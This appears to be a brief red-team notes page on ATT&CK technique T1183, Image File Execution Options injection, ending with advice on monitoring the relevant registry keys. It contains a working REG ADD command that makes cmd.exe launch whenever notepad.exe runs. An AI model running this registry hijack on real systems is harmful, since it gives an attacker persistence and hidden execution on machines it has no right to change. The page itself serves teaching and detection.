Skip to content

T1183: Image File Execution Options Injection


Modifying registry to set cmd.exe as notepad.exe debugger, so that when notepad.exe is executed, it will actually start cmd.exe:

{% code-tabs %} {% code-tabs-item title="attacker@victim" %}

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
{% endcode-tabs-item %} {% endcode-tabs %}

Launching a notepad on the victim system:

Same from the cmd shell:


Monitoring command line arguments and events modifying registry keys: HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options/<executable> and HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> should be helpful in detecting this attack:


{% embed url="" %}

{% embed url="" %}

{% embed url="" %}